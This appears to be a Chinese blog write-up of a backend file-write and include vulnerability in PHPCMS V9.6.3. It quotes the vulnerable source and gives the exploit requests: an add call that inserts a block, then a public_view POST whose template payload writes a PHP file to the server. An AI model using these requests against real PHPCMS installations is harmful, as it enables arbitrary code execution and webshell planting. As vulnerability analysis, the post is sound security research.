PHPCMS V9.6.3的后台漏洞分析
PHPCMS V9.6.3后台的漏洞分析
1、利用文件包含创建任意文件getshell
漏洞文件:\phpcmsv9\phpcms\modules\block\block_admin.php
漏洞产生点位于265~272行:
1 if (@file_put_contents($filepath,$str)) { 2 ob_start(); 3 include $filepath; 4 $html = ob_get_contents(); 5 ob_clean(); 6 @unlink($filepath); 7 }
可以看到使用file_put_contents函数将 $str 写入 $filepath 中并且包含该文件,查看$filepath和$str变量是否可控。
1 public function public_view() { 2 $id = isset($_GET['id']) && intval($_GET['id']) ? intval($_GET['id']) : exit('0'); 3 if (!$data = $this->db->get_one(array('id'=>$id))) { 4 showmessage(L('nofound')); 5 } 6 if ($data['type'] == 1) { 7 exit('<script type="text/javascript">parent.showblock('.$id.', \''.str_replace("\r\n", '', $_POST['data']).'\')</script>'); 8 } elseif ($data['type'] == 2) { 9 extract($data); 10 unset($data); 11 $title = isset($_POST['title']) ? $_POST['title'] : ''; 12 $url = isset($_POST['url']) ? $_POST['url'] : ''; 13 $thumb = isset($_POST['thumb']) ? $_POST['thumb'] : ''; 14 $desc = isset($_POST['desc']) ? $_POST['desc'] : ''; 15 $template = isset($_POST['template']) && trim($_POST['template']) ? trim($_POST['template']) : ''; 16 $data = array(); 17 foreach ($title as $key=>$v) { 18 if (empty($v) || !isset($url[$key]) ||empty($url[$key])) continue; 19 $data[$key] = array('title'=>$v, 'url'=>$url[$key], 'thumb'=>$thumb[$key], 'desc'=>str_replace(array(chr(13), chr(43)), array('<br />', ' '), $desc[$key])); 20 } 21 $tpl = pc_base::load_sys_class('template_cache'); 22 $str = $tpl->template_parse(new_stripslashes($template)); 23 $filepath = CACHE_PATH.'caches_template'.DIRECTORY_SEPARATOR.'block'.DIRECTORY_SEPARATOR.'tmp_'.$id.'.php'; 24 $dir = dirname($filepath); 25 if(!is_dir($dir)) { 26 @mkdir($dir, 0777, true); 27 }
可以看到变量 $template 可控,跟进 new_stripslashes()函数:
/** * 返回经stripslashes处理过的字符串或数组 * @param $string 需要处理的字符串或数组 * @return mixed */ function new_stripslashes($string) { if(!is_array($string)) return stripslashes($string); foreach($string as $key => $val) $string[$key] = new_stripslashes($val); return $string; }
template_parse()函数:
/** * 解析模板 * * @param $str 模板内容 * @return ture */ public function template_parse($str) { $str = preg_replace ( "/\{template\s+(.+)\}/", "<?php include template(\\1); ?>", $str ); $str = preg_replace ( "/\{include\s+(.+)\}/", "<?php include \\1; ?>", $str ); $str = preg_replace ( "/\{php\s+(.+)\}/", "<?php \\1?>", $str ); $str = preg_replace ( "/\{if\s+(.+?)\}/", "<?php if(\\1) { ?>", $str ); $str = preg_replace ( "/\{else\}/", "<?php } else { ?>", $str ); $str = preg_replace ( "/\{elseif\s+(.+?)\}/", "<?php } elseif (\\1) { ?>", $str ); $str = preg_replace ( "/\{\/if\}/", "<?php } ?>", $str ); //for 循环 $str = preg_replace("/\{for\s+(.+?)\}/","<?php for(\\1) { ?>",$str); $str = preg_replace("/\{\/for\}/","<?php } ?>",$str); //++ -- $str = preg_replace("/\{\+\+(.+?)\}/","<?php ++\\1; ?>",$str); $str = preg_replace("/\{\-\-(.+?)\}/","<?php ++\\1; ?>",$str); $str = preg_replace("/\{(.+?)\+\+\}/","<?php \\1++; ?>",$str); $str = preg_replace("/\{(.+?)\-\-\}/","<?php \\1--; ?>",$str); $str = preg_replace ( "/\{loop\s+(\S+)\s+(\S+)\}/", "<?php \$n=1;if(is_array(\\1)) foreach(\\1 AS \\2) { ?>", $str ); $str = preg_replace ( "/\{loop\s+(\S+)\s+(\S+)\s+(\S+)\}/", "<?php \$n=1; if(is_array(\\1)) foreach(\\1 AS \\2 => \\3) { ?>", $str ); $str = preg_replace ( "/\{\/loop\}/", "<?php \$n++;}unset(\$n); ?>", $str ); $str = preg_replace ( "/\{([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff:]*\(([^{}]*)\))\}/", "<?php echo \\1;?>", $str ); $str = preg_replace ( "/\{\\$([a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff:]*\(([^{}]*)\))\}/", "<?php echo \\1;?>", $str ); $str = preg_replace ( "/\{(\\$[a-zA-Z_\x7f-\xff][a-zA-Z0-9_\x7f-\xff]*)\}/", "<?php echo \\1;?>", $str ); $str = preg_replace_callback("/\{(\\$[a-zA-Z0-9_\[\]\'\"\$\x7f-\xff]+)\}/s", array($this, 'addquote'),$str); $str = preg_replace ( "/\{([A-Z_\x7f-\xff][A-Z0-9_\x7f-\xff]*)\}/s", "<?php echo \\1;?>", $str ); $str = preg_replace_callback("/\{pc:(\w+)\s+([^}]+)\}/i", array($this, 'pc_tag_callback'), $str); $str = preg_replace_callback("/\{\/pc\}/i", array($this, 'end_pc_tag'), $str); $str = "<?php defined('IN_PHPCMS') or exit('No permission resources.'); ?>" . $str; return $str; }
可以看到并无对 $template 的有效过滤,从而导致 $str 可控。再看漏洞产生点,是将 $str 写入文件中包含该文件,然后再将该文件删除。那么可以构造payload:
<?php file_put_contents("phpinfo.php","<?php phpinfo();?>");
接下来寻找怎么利用该漏洞,在函数 public_view() 中,跟入get_one()函数:
/** * 获取单条记录查询 * @param $data 需要查询的字段值[例`name`,`gender`,`birthday`] * @param $table 数据表 * @param $where 查询条件 * @param $order 排序方式 [默认按数据库默认方式排序] * @param $group 分组方式 [默认为空] * @return array/null 数据查询结果集,如果不存在,则返回空 */ public function get_one($data, $table, $where = '', $order = '', $group = '') { $where = $where == '' ? '' : ' WHERE '.$where; $order = $order == '' ? '' : ' ORDER BY '.$order; $group = $group == '' ? '' : ' GROUP BY '.$group; $limit = ' LIMIT 1'; $field = explode( ',', $data); array_walk($field, array($this, 'add_special_char')); $data = implode(',', $field); $sql = 'SELECT '.$data.' FROM `'.$this->config['database'].'`.`'.$table.'`'.$where.$group.$order.$limit; $this->execute($sql); $res = $this->fetch_next(); $this->free_result(); return $res; }
可以看到是查询一条数据,其 sql 语句为: select * from phpcmsv9.block where id=$id limit 1; 并且需要返回一个数组。否则报错 nofound。因此需要先使用 add() 函数插入一条
数据并且 type 字段为 2,跟进 add() 函数:
1 public function add() { 2 $pos = isset($_GET['pos']) && trim($_GET['pos']) ? trim($_GET['pos']) : showmessage(L('illegal_operation')); 3 if (isset($_POST['dosubmit'])) { 4 $name = isset($_POST['name']) && trim($_POST['name']) ? trim($_POST['name']) : showmessage(L('illegal_operation'), HTTP_REFERER); 5 $type = isset($_POST['type']) && intval($_POST['type']) ? intval($_POST['type']) : 1; 6 //判断名称是否已经存在 7 if ($this->db->get_one(array('name'=>$name))) { 8 showmessage(L('name').L('exists'), HTTP_REFERER); 9 } 10 if ($id = $this->db->insert(array('name'=>$name, 'pos'=>$pos, 'type'=>$type, 'siteid'=>$this->siteid), true)) { 11 //设置权限 12 $priv = isset($_POST['priv']) ? $_POST['priv'] : ''; 13 if (!empty($priv)) { 14 if (is_array($priv)) foreach ($priv as $v) { 15 if (empty($v)) continue; 16 $this->priv_db->insert(array('roleid'=>$v, 'blockid'=>$id, 'siteid'=>$this->siteid)); 17 } 18 } 19 showmessage(L('operation_success'), '?m=block&c=block_admin&a=block_update&id='.$id); 20 } else { 21 showmessage(L('operation_failure'), HTTP_REFERER); 22 } 23 } else { 24 $show_header = $show_validator = true; 25 pc_base::load_sys_class('form'); 26 $administrator = getcache('role', 'commons'); 27 unset($administrator[1]); 28 include $this->admin_tpl('block_add_edit'); 29 } 30 }
可以看到第10行,会将 post 数据写入 v9_block 表中,如要将数据写入表中需要满足条件:
1、$pos 不为空。
2、$dosubmit 不为空。
3、$name 不为空,并且 $type = 2。
4、$name 不能与已有的数据重复。
于是构造 url : http://www.test.com/index.php?m=block&c=block_admin&pc_hash=123456&a=add&pos=1
POST数据:dosubmit=1&name=test&type=2
这第一步访问上述地址将数据插入至v9_block表中。

可以看到 id 为4即为刚才插入的数据。接下来将payload写入文件。
构造 URL:http://www.test.com/index.php?m=block&c=block_admin&a=public_view&id=4
POST数据:template=<?php file_put_contents("phpinfo.php","<?php phpinfo();?>");

访问:

注:要想利用成功,在往v9_block表中插入数据时需要判断 $pc_hash 是否合法,所以想要利用该漏洞需先获取$pc_hash的值。而pc_hash的值登录后台即可在url中获取。


 浙公网安备 33010602011771号
浙公网安备 33010602011771号